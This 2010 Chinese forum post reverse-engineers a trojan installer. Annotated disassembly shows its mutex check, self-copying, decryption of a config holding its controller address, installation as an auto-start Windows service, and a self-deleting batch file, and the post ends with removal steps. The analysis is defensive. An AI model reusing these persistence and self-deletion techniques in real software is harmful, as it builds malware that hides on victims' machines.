某木马分析 by 当红小生[LSG]

hixiaosheng 发表于 2010-3-5 20:53

本帖最后由是昔流芳于 2011-2-11 12:20 编辑

004745BC .E8 E721F9FF call Setup.004067A8          ;这里是一些反调试的东西，锻炼一下手动跟踪能力可以跟进
004745C1 .33C0       xor eax,eax
004745C3 .55          push ebp
004745C4 .68 67494700 push Setup.00474967
004745C9 .64:FF30    push dword ptr fs:
004745CC .64:8920    mov dword ptr fs:,esp
004745CF .E8 A4FBFFFF call Setup.00474178          ;F7跟进
00463982 .A1 10304100 mov eax,dword ptr ds:
00463987 .E8 84FFF9FF call Setup.00403910          ;获取一些字符串
0046398C .8BD8       mov ebx,eax
0046398E .8B15 AC994700 mov edx,dword ptr ds: ;Setup.00479888
00463994 .8B12       mov edx,dword ptr ds:    ;(ASCII "SoftWare\Microsoft\Windows\CurrentVersion\Run
00463996 .8BC3       mov eax,ebx
00463998 .8B08       mov ecx,dword ptr ds:
0046399A .FF51 2C    call dword ptr ds:    ;:\Program Files
0046399D .8D4D F8    lea ecx,dword ptr ss:
004639A0 .33D2       xor edx,edx
004639A2 .8BC3       mov eax,ebx
004639A4 .8B30       mov esi,dword ptr ds:
004639A6 .FF56 0C    call dword ptr ds:    ;SoftWare\Microsoft\Windows\CurrentVersion\Run
004639A9 .8B55 F8    mov edx,dword ptr ss:
004639AC .B8 7CB44700 mov eax,Setup.0047B47C
004639B1 .E8 B20DFAFF call Setup.00404768
004639B6 .8D4D F4    lea ecx,dword ptr ss:
004639B9 .BA 01000000 mov edx,1
004639BE .8BC3       mov eax,ebx
004639C0 .8B30       mov esi,dword ptr ds:
004639C2 .FF56 0C    call dword ptr ds:    ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Setup")
004639C5 .8B55 F4    mov edx,dword ptr ss:
004639C8 .B8 78B44700 mov eax,Setup.0047B478
004639CD .E8 960DFAFF call Setup.00404768
004639D2 .8D4D F0    lea ecx,dword ptr ss:
004639D5 .BA 02000000 mov edx,2
004639DA .8BC3       mov eax,ebx
004639DC .8B30       mov esi,dword ptr ds:
004639DE .FF56 0C    call dword ptr ds:    ;config
004639E1 .8B55 F0    mov edx,dword ptr ss:
004639E4 .B8 74B44700 mov eax,Setup.0047B474
004639E9 .E8 7A0DFAFF call Setup.00404768
004639EE .8D4D EC    lea ecx,dword ptr ss:
004639F1 .BA 03000000 mov edx,3
004639F6 .8BC3       mov eax,ebx
004639F8 .8B30       mov esi,dword ptr ds:
004639FA .FF56 0C    call dword ptr ds:
004639FD .8B55 EC    mov edx,dword ptr ss:
00463A00 .B8 70B44700 mov eax,Setup.0047B470
00463A05 .E8 5E0DFAFF call Setup.00404768
00463A0A .8D4D E8    lea ecx,dword ptr ss:
00463A0D .BA 04000000 mov edx,4
00463A12 .8BC3       mov eax,ebx
00463A14 .8B30       mov esi,dword ptr ds:
00463A16 .FF56 0C    call dword ptr ds:    ;(ASCII ":\Program Files")
00463A19 .8B55 E8    mov edx,dword ptr ss:
00463A1C .B8 6CB44700 mov eax,Setup.0047B46C
00463A21 .E8 420DFAFF call Setup.00404768
00463A26 .8BC3       mov eax,ebx
00463A28 .E8 13FFF9FF call Setup.00403940
00463A2D .A1 70B44700 mov eax,dword ptr ds:
00463A32 .E8 9D11FAFF call Setup.00404BD4
00463A37 .50          push eax
00463A38 .A1 74B44700 mov eax,dword ptr ds:
00463A3D .E8 9211FAFF call Setup.00404BD4
00463A42 .B9 00B54700 mov ecx,Setup.0047B500
00463A47 .5A          pop edx                      ;"TFrom2"打开资源编辑器可以看到
00463A48 .E8 FBF9FFFF call Setup.00463448          ;F7读取一些加密的配置信息以及加密上线的地址
00463A4D .84C0       test al,al
00463A4F .0F84 DF010000 je Setup.00463C34             ;判断读取是否成功，不成功就OVER了
00463A55 .E8 5631FAFF call <jmp.&kernel32.GetVersion>;GetVersion
00463A5A .A9 00000080 test eax,80000000
00463A5F .75 0A       jnz short Setup.00463A6B
00463A61 .C705 DC984700>mov dword ptr ds:,-1
00463A6B >8D45 FC    lea eax,dword ptr ss:
00463A6E .E8 BDFDFFFF call Setup.00463830          ;F7,解密出上线地址

0046346F .FF15 AC984700 call dword ptr ds:    ;kernel32.FindResourceA
00463475 .8BD8       mov ebx,eax
00463477 .85DB       test ebx,ebx
00463479 .74 4A       je short Setup.004634C5
0046347B .90          nop
0046347C .53          push ebx
0046347D .A1 64A64700 mov eax,dword ptr ds:
00463482 .50          push eax
00463483 .FF15 B0984700 call dword ptr ds:    ;kernel32.LoadResource
00463489 .8BF0       mov esi,eax
0046348B .85F6       test esi,esi
0046348D .74 36       je short Setup.004634C5
0046348F .90          nop
00463490 .53          push ebx
00463491 .A1 64A64700 mov eax,dword ptr ds:
00463496 .50          push eax
00463497 .FF15 B4984700 call dword ptr ds:    ;kernel32.SizeofResource
0046349D .8BD8       mov ebx,eax
0046349F .90          nop
004634A0 .8B45 FC    mov eax,dword ptr ss:
004634A3 .8BD3       mov edx,ebx
004634A5 .E8 B618FAFF call Setup.00404D60
004634AA .8B45 FC    mov eax,dword ptr ss:
004634AD .E8 7A17FAFF call Setup.00404C2C
004634B2 .50          push eax
004634B3 .56          push esi                      ; /hResource
004634B4 .E8 8F37FAFF call <jmp.&kernel32.LockResource>; \LockResource

00463864 .E8 430FFAFF call Setup.004047AC          ;解密出:\Program Files
00463869 .EB 76       jmp short Setup.004638E1
0046386B .A1 00334100 mov eax,dword ptr ds:
00463870 .E8 9B00FAFF call Setup.00403910
00463875 .8BF0       mov esi,eax
00463877 .8B45 F8    mov eax,dword ptr ss:
0046387A .E8 5511FAFF call Setup.004049D4
0046387F .50          push eax
00463880 .8D45 F8    lea eax,dword ptr ss:
00463883 .E8 A413FAFF call Setup.00404C2C
00463888 .8BD0       mov edx,eax
0046388A .8BC6       mov eax,esi
0046388C .59          pop ecx
0046388D .E8 F636FBFF call Setup.00416F88
00463892 .6A 00       push 0
00463894 .6A 00       push 0
00463896 .8BC6       mov eax,esi
00463898 .E8 A734FBFF call Setup.00416D44
0046389D .8BCE       mov ecx,esi
0046389F .B2 01       mov dl,1
004638A1 .A1 CC424500 mov eax,dword ptr ds:
004638A6 .E8 7910FFFF call Setup.00454924
004638AB .8BD8       mov ebx,eax
004638AD .6A 00       push 0
004638AF .6A 00       push 0
004638B1 .8BC3       mov eax,ebx
004638B3 .E8 8C34FBFF call Setup.00416D44
004638B8 .8BC3       mov eax,ebx
004638BA .8B10       mov edx,dword ptr ds:
004638BC .FF12       call dword ptr ds:
004638BE .8BD0       mov edx,eax
004638C0 .8D45 F8    lea eax,dword ptr ss:
004638C3 .E8 9814FAFF call Setup.00404D60
004638C8 .8BC3       mov eax,ebx
004638CA .8B10       mov edx,dword ptr ds:
004638CC .FF12       call dword ptr ds:
004638CE .50          push eax
004638CF .8D45 F8    lea eax,dword ptr ss:
004638D2 .E8 5513FAFF call Setup.00404C2C
004638D7 .8BD0       mov edx,eax
004638D9 .8BC3       mov eax,ebx
004638DB .59          pop ecx
004638DC .8B38       mov edi,dword ptr ds:
004638DE .FF57 0C    call dword ptr ds:
004638E1 >8D55 F4    lea edx,dword ptr ss:
004638E4 .8B45 F8    mov eax,dword ptr ss: ;密钥key放入eax
004638E7 .E8 1CA6FBFF call Setup.0041DF08          ;解密call，对算法有兴趣的可以跟进，解密出上线地址
004638EC .8B55 F4    mov edx,dword ptr ss:
004638EF .8D45 F8    lea eax,dword ptr ss:
004638F2 .E8 B50EFAFF call Setup.004047AC
004638F7 .8BC6       mov eax,esi

00463AF2 .E8 8D0EFAFF call Setup.00404984             ;"%ProgramFiles%\Internet Explorer\IEXPLORE.EXE")
00463AF7 .8B45 DC    mov eax,dword ptr ss:
00463AFA .8D55 E0    lea edx,dword ptr ss:
00463AFD .E8 420C0000 call Setup.00464744             ; "C:\Program Files\Internet Explorer\IEXPLORE.EXE")
00463B02 .8B55 E0    mov edx,dword ptr ss:
00463B05 .B8 C8B44700 mov eax,Setup.0047B4C8
00463B0A .E8 590CFAFF call Setup.00404768
00463B0F .8B83 B8010000 mov eax,dword ptr ds:
00463B15 .A3 E8984700 mov dword ptr ds:,eax
00463B1A .0FB743 74 movzx eax,word ptr ds:
00463B1E .A3 88B44700 mov dword ptr ds:,eax
00463B23 .8D55 D8    lea edx,dword ptr ss:
00463B26 .A1 A8B44700 mov eax,dword ptr ds:
00463B2B .E8 2859FAFF call Setup.00409458             ;获取名称
00463B30 .8B55 D8    mov edx,dword ptr ss:
00463B33 .B8 ACB44700 mov eax,Setup.0047B4AC
00463B38 .E8 2B0CFAFF call Setup.00404768
00463B3D .0FB743 76 movzx eax,word ptr ds:
00463B41 .A3 B4B44700 mov dword ptr ds:,eax
00463B46 .B8 B8B44700 mov eax,Setup.0047B4B8
00463B4B .8D53 78    lea edx,dword ptr ds: ;分组名称
00463BDC .B8 FCB44700 mov eax,Setup.0047B4FC
00463BE1 .8D93 DF010000 lea edx,dword ptr ds: ;描述信息
00463BE7 .B9 64000000 mov ecx,64
00463BEC .E8 930DFAFF call Setup.00404984
00463BF1 .B8 F8B44700 mov eax,Setup.0047B4F8
00463BF6 .8D93 43020000 lea edx,dword ptr ds: ;显示名称
004745F5 .E8 DA05F9FF call Setup.00404BD4             ;复制路径
004745FA .50          push eax
004745FB .8D55 EC    lea edx,dword ptr ss:
004745FE .33C0       xor eax,eax
00474600 .E8 5FE5F8FF call Setup.00402B64             ;获取自身路径
00474605 .8B45 EC    mov eax,dword ptr ss:
00474608 .E8 C705F9FF call Setup.00404BD4
0047460D .50          push eax
0047460E .A1 4C9C4700 mov eax,dword ptr ds:
00474613 .8B00       mov eax,dword ptr ds:
00474615 .FFD0       call eax                      ;kernel32.lstrcmpiA)
00474617 .85C0       test eax,eax
00474619 .0F84 CF020000 je Setup.004748EE             ;跳到退出
0047461F .E8 00FCFFFF call Setup.00474224             ;F7
00474224/[ DISCUZ_CODE_1 ]nbsp; B9 68424700 mov ecx,Setup.00474268          ;ASCII "SJhensoie23sdsf"
00474229|.83CA FF    or edx,FFFFFFFF
0047422C|.33C0       xor eax,eax
0047422E|.E8 2D42FFFF call Setup.00468460             ;创建互斥体
00468460/[ DISCUZ_CODE_1 ]nbsp; 51          push ecx                      ; /MutexName
00468461|.83FA 01    cmp edx,1                      ; |
00468464|.1BD2       sbb edx,edx                   ; |
00468466|.42          inc edx                         ; |
00468467|.83E2 7F    and edx,7F                      ; |
0046846A|.52          push edx                      ; |InitialOwner
0046846B|.50          push eax                      ; |pSecurity
0046846C|.FF15 B8984700 call dword ptr ds:    ; \CreateMutexA
00468472\.C3          retn

00474233|.A3 70C64700 mov dword ptr ds:,eax
00474238|.833D 70C64700>cmp dword ptr ds:,0
0047423F|.74 24       je short Setup.00474265
00474241|.90          nop
00474242|.E8 F128F9FF call <jmp.&kernel32.GetLastError> ; [GetLastError
00474247|.3D B7000000 cmp eax,0B7
0047424C|.75 17       jnz short Setup.00474265
0047424E|.A1 70C64700 mov eax,dword ptr ds:
00474253|.50          push eax                      ; /hObject => NULL
00474254|.E8 9727F9FF call <jmp.&kernel32.CloseHandle>; \CloseHandle
00474259|.6A 00       push 0
0047425B|.A1 C49C4700 mov eax,dword ptr ds:
00474260|.8B00       mov eax,dword ptr ds:
00474262|.FFD0       call eax
00474264|.90          nop
00474265\>C3          retn
004090DC/[ DISCUZ_CODE_1 ]nbsp; 55          push ebp
004090DD|.8BEC       mov ebp,esp
004090DF|.81C4 B4FEFFFF add esp,-14C
004090E5|.53          push ebx
004090E6|.8BD8       mov ebx,eax
004090E8|.8D85 B4FEFFFF lea eax,
004090EE|.50          push eax
004090EF|.8BC3       mov eax,ebx
004090F1|.E8 DEBAFFFF call Setup.00404BD4
004090F6|.50          push eax                      ; |FileName
004090F7|.E8 84D9FFFF call <jmp.&kernel32.FindFirstFile>; \FindFirstFileA
004090FC|.83F8 FF    cmp eax,-1
004090FF|.74 34       je short Setup.00409135
00409101|.50          push eax                      ; /hSearch
00409102|.E8 71D9FFFF call <jmp.&kernel32.FindClose> ; \FindClose
00409107|.F685 B4FEFFFF>test byte ptr ss:,10
0040910E|.75 25       jnz short Setup.00409135
00409110|.8D45 F4    lea eax,
00409113|.50          push eax                      ; /pLocalFileTime
00409114|.8D85 C8FEFFFF lea eax,             ; |
0040911A|.50          push eax                      ; |pFileTime
0040911B|.E8 48D9FFFF call <jmp.&kernel32.FileTimeToLoc>; \FileTimeToLocalFileTime
00409120|.8D45 FC    lea eax,
00409123|.50          push eax                      ; /pDOSTime
00409124|.8D45 FE    lea eax,dword ptr ss:    ; |
00409127|.50          push eax                      ; |pDOSDate
00409128|.8D45 F4    lea eax,             ; |
0040912B|.50          push eax                      ; |pFileTime
0040912C|.E8 2FD9FFFF call <jmp.&kernel32.FileTimeToDos>; \FileTimeToDosDateTime
00409131|.85C0       test eax,eax
00409133|.75 07       jnz short Setup.0040913C
00409135|>C745 FC FFFFF>mov ,-1
0040913C|>8B45 FC    mov eax,
0040913F|.5B          pop ebx
00409140|.8BE5       mov esp,ebp
00409142|.5D          pop ebp
00409143\.C3          retn
004746A8 . /74 6E       je short Setup.00474718       ;判断是否已经自复制
004746AA . |B8 B80B0000 mov eax,0BB8
004746AF . |E8 F8EFFEFF call Setup.004636AC             ;获取开机时间
004746B4 . |6A 00       push 0
004746B6 . |A1 E89B4700 mov eax,dword ptr ds:
004746BB . |8B00       mov eax,dword ptr ds:
004746BD . |E8 1205F9FF call Setup.00404BD4             ;获取路径
004746C2 . |50          push eax
004746C3 . |A1 449D4700 mov eax,dword ptr ds:
004746C8 . |8B00       mov eax,dword ptr ds:
004746CA . |FFD0       call eax                      ;(kernel32.SetFileAttributesA)
004746CC . |A1 E89B4700 mov eax,dword ptr ds:
004746D1 . |8B00       mov eax,dword ptr ds:
004746D3 . |E8 904CF9FF call Setup.00409368             ;删除文件
004746D8 . |A1 E89B4700 mov eax,dword ptr ds:
004746DD . |8B00       mov eax,dword ptr ds:
004746DF . |E8 604AF9FF call Setup.00409144             ;查找文件
004746E4 . |84C0       test al,al
004746E6 . |74 30       je short Setup.00474718       ;判断是否存在
004746E8 . |6A 07       push 7
004746EA . |A1 E89B4700 mov eax,dword ptr ds:
004746EF . |8B00       mov eax,dword ptr ds:
004746F1 . |E8 DE04F9FF call Setup.00404BD4
004746F6 . |50          push eax
004746F7 . |A1 449D4700 mov eax,dword ptr ds:
004746FC . |8B00       mov eax,dword ptr ds:
004746FE . |FFD0       call eax                      ;SetFileAttributesA)
00474700 . |6A 00       push 0
00474702 . |A1 C49C4700 mov eax,dword ptr ds:
00474707 . |8B00       mov eax,dword ptr ds:
00474709 . |FFD0       call eax                      ;kernel32.ExitProcess

00474726 .50          push eax
00474727 .8D55 E4    lea edx,dword ptr ss:
0047472A .33C0       xor eax,eax
0047472C .E8 33E4F8FF call Setup.00402B64             ;获取自身路径
00474731 .8B45 E4    mov eax,dword ptr ss:
00474734 .E8 9B04F9FF call Setup.00404BD4
00474739 .50          push eax
0047473A .A1 709D4700 mov eax,dword ptr ds:
0047473F .8B00       mov eax,dword ptr ds:    ; (kernel32.CopyFileA)
00474741 .FFD0       call eax                      ;动态调用CopyFileA
00474743 .E8 8863F9FF call Setup.0040AAD0             ;获取时间
0040AAD0/[ DISCUZ_CODE_1 ]nbsp; 83C4 E0    add esp,-20
0040AAD3|.8D4424 08 lea eax,dword ptr ss:
0040AAD7|.50          push eax                      ; /pLocaltime
0040AAD8|.E8 63C0FFFF call <jmp.&kernel32.GetLocalTime> ; \GetLocalTime
0047477B .E8 A4E1FEFF call Setup.00462924             ;修改复制文件时间
00474780 .A1 D89B4700 mov eax,dword ptr ds:
00474785 .8B00       mov eax,dword ptr ds:
00474787 .50          push eax
00474788 .A1 E89B4700 mov eax,dword ptr ds:
0047478D .8B00       mov eax,dword ptr ds:
0047478F .E8 4004F9FF call Setup.00404BD4             ;获取复制后的路径
00474794 .50          push eax
00474795 .A1 449D4700 mov eax,dword ptr ds:
0047479A .8B00       mov eax,dword ptr ds:
00462CCC .BA 3F000000 mov edx,3F
00462CD1 .8B45 F4    mov eax,dword ptr ss:    ;"C:\WINDOWS\*.dat")
00462CD4 .E8 FF65FAFF call Setup.004092D8             ;查找文件
00462CD9 .85C0       test eax,eax
00462CDB .0F85 BB000000 jnz Setup.00462D9C
00462CE1 >8D85 98FEFFFF lea eax,dword ptr ss:
00462CE7 .8B8D A8FEFFFF mov ecx,dword ptr ss: ;bootstat.dat
00462CED .8B55 FC    mov edx,dword ptr ss:    ;C:\WINDOWS\
00462CF0 .E8 2B1DFAFF call Setup.00404A20             ;"C:\WINDOWS\bootstat.dat")
00462CF5 .8B85 98FEFFFF mov eax,dword ptr ss:
00462CFB .E8 44FEFFFF call Setup.00462B44
00462D00 .84C0       test al,al
00462D02 .0F84 81000000 je Setup.00462D89
00462D08 .33C0       xor eax,eax
00462D0A .55          push ebp
00462D0B .68 7F2D4600 push Setup.00462D7F
00462D10 .64:FF30    push dword ptr fs:
00462D13 .64:8920    mov dword ptr fs:,esp
00462D16 .6A 00       push 0
00462D18 .8D85 94FEFFFF lea eax,dword ptr ss:
00462D1E .8B8D A8FEFFFF mov ecx,dword ptr ss:
00462D24 .8B55 FC    mov edx,dword ptr ss:
00462D27 .E8 F41CFAFF call Setup.00404A20
00462D2C .8B85 94FEFFFF mov eax,dword ptr ss: ;"C:\WINDOWS\bootstat.dat")
00462D32 .E8 9D1EFAFF call Setup.00404BD4
00462D37 .50          push eax                      ; |FileName
00462D38 .FF15 C0984700 call dword ptr ds:    ; \SetFileAttributesA
00462D3E .8D85 8CFEFFFF lea eax,dword ptr ss:
00462D44 .8B8D A8FEFFFF mov ecx,dword ptr ss:
00462D4A .8B55 FC    mov edx,dword ptr ss:
00462D4D .E8 CE1CFAFF call Setup.00404A20
00462D52 .8B85 8CFEFFFF mov eax,dword ptr ss:
00462D58 .E8 771EFAFF call Setup.00404BD4
00462D5D .8BD0       mov edx,eax
00462D5F .8D85 90FEFFFF lea eax,dword ptr ss:
00462D65 .E8 A21BFAFF call Setup.0040490C
00462D6A .8B85 90FEFFFF mov eax,dword ptr ss:
00462D70 .E8 F365FAFF call Setup.00409368             ;deletefile
00462D75 .33C0       xor eax,eax
00462D77 .5A          pop edx
00462D78 .59          pop ecx
00462D79 .59          pop ecx
00462D7A .64:8910    mov dword ptr fs:,edx
00462D7D .EB 0A       jmp short Setup.00462D89
00462D7F .^ E9 5C10FAFF jmp Setup.00403DE0
00462D84 .E8 BF13FAFF call Setup.00404148
00462D89 >8D85 9CFEFFFF lea eax,dword ptr ss:
00462D8F .E8 9465FAFF call Setup.00409328             ;继续查找文件
00462D94 .85C0       test eax,eax
00462D96 .^ 0F84 45FFFFFF je Setup.00462CE1             ;循环创建一些.dat文件
00462D9C >8D85 9CFEFFFF lea eax,dword ptr ss:
00462DA2 .E8 A565FAFF call Setup.0040934C             ;FindClose
004747DB .E8 2491FAFF call Setup.0041D904                      ;F7,获取服务名称
0041D948 .E8 6F9EFEFF call <jmp.&advapi32.OpenSCManagerA>
0041D94D .8BD8       mov ebx,eax
0041D94F .85DB       test ebx,ebx
0041D951 .74 31       je short Setup.0041D984判断服务是否存在
0041D953 .68 FF010F00 push 0F01FF
0041D958 .8B45 FC    mov eax,dword ptr ss:
0041D95B .E8 7472FEFF call Setup.00404BD4
0041D960 .50          push eax
0041D961 .53          push ebx
0041D962 .E8 5D9EFEFF call <jmp.&advapi32.OpenServiceA>
0041D967 .8BF8       mov edi,eax
0041D969 .85FF       test edi,edi
0041D96B .74 11       je short Setup.0041D97E
0041D96D .57          push edi
0041D96E .E8 319EFEFF call <jmp.&advapi32.DeleteService>
0041D973 .BE 01000000 mov esi,1
0041D978 .57          push edi
0041D979 .E8 0E9EFEFF call <jmp.&advapi32.CloseServiceHandle>
0041D97E >53          push ebx
0041D97F .E8 089EFEFF call <jmp.&advapi32.CloseServiceHandle>
0041D984 >85F6       test esi,esi
0041D986 .7E 06       jle short Setup.0041D98E
0041D988 .C645 FB 01 mov byte ptr ss:,1
0041D98C .EB 04       jmp short Setup.0041D992
0041D98E >C645 FB 00 mov byte ptr ss:,0
0041D992 >33C0       xor eax,eax
0041D994 .5A          pop edx
0041D995 .59          pop ecx
0041D996 .59          pop ecx
0041D997 .64:8910    mov dword ptr fs:,edx
004747E0 .68 E8030000 push 3E8                                  ;1s
004747E5 .A1 C89B4700 mov eax,dword ptr ds:
004747EA .8B00       mov eax,dword ptr ds:
004747EC .FFD0       call eax                                  ; (kernel32.Sleep)
004747EE .A1 FC994700 mov eax,dword ptr ds:
004747F3 .8B00       mov eax,dword ptr ds:                ;服务描述
004747F5 .50          push eax
004747F6 .A1 F09C4700 mov eax,dword ptr ds:
004747FB .8B00       mov eax,dword ptr ds:                ;显示名称
004747FD .E8 D203F9FF call Setup.00404BD4
00474802 .50          push eax
00474803 .A1 249E4700 mov eax,dword ptr ds:
00474808 .8B00       mov eax,dword ptr ds:                ;服务名称
0047480A .E8 C503F9FF call Setup.00404BD4
0047480F .8B0D E89B4700 mov ecx,dword ptr ds:             ;Setup.0047B4A8
00474815 .8B09       mov ecx,dword ptr ds:                ;自复制后的文件路径
00474817 .5A          pop edx
00474818 .E8 FB8AFAFF call Setup.0041D318                      ;F7进去溜达下，创建服务
0041D320 .57          push edi
0041D321 .33DB       xor ebx,ebx
0041D323 .895D E0    mov dword ptr ss:,ebx
0041D326 .895D E4    mov dword ptr ss:,ebx
0041D329 .895D EC    mov dword ptr ss:,ebx
0041D32C .894D FC    mov dword ptr ss:,ecx          ;取木马目录
0041D32F .8BFA       mov edi,edx                         ;显示名称
0041D331 .8BF0       mov esi,eax                         ;服务名称
0041D333 .8B45 FC    mov eax,dword ptr ss:          ;木马路径放入eax
0041D336 .E8 8978FEFF call Setup.00404BC4                   ;获取描述
0041D33B .8B45 08    mov eax,dword ptr ss:
0041D33E .E8 8178FEFF call Setup.00404BC4
0041D343 .33C0       xor eax,eax
····
····
0041D36F .E8 48A4FEFF call <jmp.&advapi32.OpenSCManagerA> ;OpenSCManagerA>
0041D374 .8BD8       mov ebx,eax
0041D376 .85DB       test ebx,ebx
0041D378 .75 2E       jnz short Setup.0041D3A8             ;判断是否打开成功
0041D37A .E8 B997FEFF call <jmp.&kernel32.GetLastError>    ; [GetLastError
0041D37F .8D55 E4    lea edx,dword ptr ss:
0041D382 .E8 61ECFEFF call Setup.0040BFE8
0041D387 .8B4D E4    mov ecx,dword ptr ss:
0041D38A .B2 01       mov dl,1
0041D38C .A1 CC7B4000 mov eax,dword ptr ds:
0041D391 .E8 7EF4FEFF call Setup.0040C814
0041D396 .E8 316DFEFF call Setup.004040CC
0041D39B .33C0       xor eax,eax
0041D39D .5A          pop edx
0041D39E .59          pop ecx
0041D39F .59          pop ecx
0041D3A0 .64:8910    mov dword ptr fs:,edx
0041D3A3 .E9 2D010000 jmp Setup.0041D4D5

0047481D .84C0       test al,al
0047481F .75 75       jnz short Setup.00474896                ;判断是否成功
00474821 .6A 00       push 0
00474823 .A1 C49C4700 mov eax,dword ptr ds:
00474828 .8B00       mov eax,dword ptr ds:
0047482A .FFD0       call eax                                  ;ExitProcess
0047482C .EB 68       jmp short Setup.00474896
0047482E >8B15 249E4700 mov edx,dword ptr ds:             ;Setup.0047B4F4
0041D3BA .50          push eax                            ; |BinaryPathName
0041D3BB .6A 00       push 0                               ; |ErrorControl = SERVICE_ERROR_IGNORE
0041D3BD .6A 02       push 2                               ; |StartType = SERVICE_AUTO_START
0041D3BF .68 10010000 push 110                            ; |ServiceType = SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS
0041D3C4 .68 FF010F00 push 0F01FF                         ; |DesiredAccess = SERVICE_ALL_ACCESS
0041D3C9 .57          push edi                            ; |DisplayName
0041D3CA .56          push esi                            ; |ServiceName
0041D3CB .53          push ebx                            ; |hManager
0041D3CC .E8 CBA3FEFF call <jmp.&advapi32.CreateServiceA> ; \CreateServiceA
0041D3D1 .8945 F4    mov dword ptr ss:,eax
0041D3D4 .837D F4 00 cmp dword ptr ss:,0
0041D3D8 .75 2E       jnz short Setup.0041D408
0041D3DA .E8 5997FEFF call <jmp.&kernel32.GetLastError>    ; [GetLastError
0041D3DF .8D55 E0    lea edx,dword ptr ss:

0041D465 .E8 56C3FEFF call Setup.004097C0                   ;循环拷贝描述字符串
0041D46A .8B45 F0    mov eax,dword ptr ss:
0041D46D .50          push eax
0041D46E .6A 01       push 1
0041D470 .8B45 F4    mov eax,dword ptr ss:
0041D473 .50          push eax
0041D474 .A1 089E4700 mov eax,dword ptr ds:
0041D479 .8B00       mov eax,dword ptr ds:
0041D47B .FFD0       call eax                            ;(advapi32.ChangeServiceConfig2A)

0041D4AF .8B45 F4    mov eax,dword ptr ss:
0041D4B2 .50          push eax
0041D4B3 .E8 3CA3FEFF call <jmp.&advapi32.StartServiceA>          ;StartServiceA
0041D4B8 .8B45 F4    mov eax,dword ptr ss:
0041D4BB .50          push eax
0041D4BC .E8 CBA2FEFF call <jmp.&advapi32.CloseServiceHandle>
0041D4C1 .33C0       xor eax,eax
0041D4C3 .5A          pop edx
0041D4C4 .59          pop ecx
0041D4C5 .59          pop ecx

0047481F . /75 75       jnz short Setup.00474896                   ;判断是否创建成功，不成功就exit了
00474821 . |6A 00       push 0
00474823 . |A1 C49C4700 mov eax,dword ptr ds:
00474828 . |8B00       mov eax,dword ptr ds:
0047482A . |FFD0       call eax                                     ;ExitProcess
0047482C . |EB 68       jmp short Setup.00474896
0047482E > |8B15 249E4700 mov edx,dword ptr ds:                ;Setup.0047B4F4
00474834 . |8B12       mov edx,dword ptr ds:
00474836 . |33C0       xor eax,eax
004748A3 . /75 20       jnz short Setup.004748C5                   ;判断是否提示,要选上这项就XXXX。。。
004748A5 . |803D 74C64700>cmp byte ptr ds:,0
004748AC . |75 17       jnz short Setup.004748C5
004748AE . |6A 40       push 40
004748B0 . |68 78494700 push Setup.00474978                         ;ASCII "wo shi mu ma"
004748B5 . |68 84494700 push Setup.00474984                         ;ASCII "installed successfully"
004748BA . |6A 00       push 0
004748BC . |A1 B09B4700 mov eax,dword ptr ds:
004748C1 . |8B00       mov eax,dword ptr ds:
004748C3 . |FFD0       call eax
004748C5 > \A1 949A4700 mov eax,dword ptr ds:

004748CD . /74 12       je short Setup.004748E1
004748CF . |8D55 E0    lea edx,dword ptr ss:                ;描述
004748D2 . |33C0       xor eax,eax
004748D4 . |E8 8BE2F8FF call Setup.00402B64                         ;获取自身路径
00402B7A|. /75 1E       jnz short Setup.00402B9A
00402B7C|. |68 05010000 push 105                                     ; /BufSize = 105 (261.)
00402B81|. |8D4424 04 lea eax,dword ptr ss:                ; |
00402B85|. |50          push eax                                     ; |PathBuffer
00402B86|. |6A 00       push 0                                     ; |hModule = NULL
00402B88|. |E8 27E7FFFF call <jmp.&kernel32.GetModuleFileNameA>    ; \GetModuleFileNameA
00402B8D|. |8BC8       mov ecx,eax
00402B8F|. |8BD4       mov edx,esp
00402B91|. |8BC3       mov eax,ebx
00402B93|. |E8 6C1C0000 call Setup.00404804
00402B98|. |EB 1E       jmp short Setup.00402BB8
00402B9A|> \E8 F5E6FFFF call <jmp.&kernel32.GetCommandLineA>       ; [GetCommandLineA
004748D9 . |8B45 E0    mov eax,dword ptr ss:
004748DC . |E8 4F39FFFF call Setup.00468230                         ;F7进去自删除，创建个bat自删除，经典啊！
00468296 .68 DC834600 push Setup.004683DC                         ;.bat
0046829B .8D45 F8    lea eax,dword ptr ss:
0046829E .BA 03000000 mov edx,3
004682A3 .E8 ECC7F9FF call Setup.00404A94
004682A8 .B2 01       mov dl,1
004682AA .A1 10304100 mov eax,dword ptr ds:
004682AF .E8 5CB6F9FF call Setup.00403910
004682B4 .8BD8       mov ebx,eax
004682B6 .BA EC834600 mov edx,Setup.004683EC                      ;:delfile
004682BB .8BC3       mov eax,ebx
004682BD .8B08       mov ecx,dword ptr ds:
004682BF .FF51 38    call dword ptr ds:
004682C2 .68 00844600 push Setup.00468400                         ;del "
004682C7 .FF75 FC    push dword ptr ss:
004682CA .68 10844600 push Setup.00468410                         ;"
004682CF .8D45 98    lea eax,dword ptr ss:
004682D2 .BA 03000000 mov edx,3
004682D7 .E8 B8C7F9FF call Setup.00404A94
004682DC .8B55 98    mov edx,dword ptr ss:
004682DF .8BC3       mov eax,ebx
004682E1 .8B08       mov ecx,dword ptr ds:
004682E3 .FF51 38    call dword ptr ds:
004682E6 .68 1C844600 push Setup.0046841C                         ;if exist "
004682EB .FF75 FC    push dword ptr ss:
004682EE .68 30844600 push Setup.00468430                         ;" goto delfile
004682F3 .8D45 94    lea eax,dword ptr ss:
004682F6 .BA 03000000 mov edx,3
004682FB .E8 94C7F9FF call Setup.00404A94
00468300 .8B55 94    mov edx,dword ptr ss:
00468303 .8BC3       mov eax,ebx
00468305 .8B08       mov ecx,dword ptr ds:
00468307 .FF51 38    call dword ptr ds:
0046830A .BA 48844600 mov edx,Setup.00468448                      ;del %0
0046830F .8BC3       mov eax,ebx
00468311 .8B08       mov ecx,dword ptr ds:
00468313 .FF51 38    call dword ptr ds:
00468316 .BA 58844600 mov edx,Setup.00468458                      ;exit

004748E1 > \6A 00       push 0
004748E3 .A1 C49C4700 mov eax,dword ptr ds:
004748E8 .8B00       mov eax,dword ptr ds:
004748EA .FFD0       call eax                                     ;kernel32.ExitProcess)

大体流程：
1.创建互斥体判断是否已经运行，运行则退出。
2.检查自复制的目录是否已经复制，是则删除重新自复制，并设置文件属性。
3.程序读自身的一些加密配置数据（安装目录和上线信息），然后解密。
4.创建服务达到自启动。
5.自删除。
查杀方法：

打开XueTr.exe，查找服务，可以明显看到木马（字体有色有差异），断开网络，停止服务，查找路径直接删除。

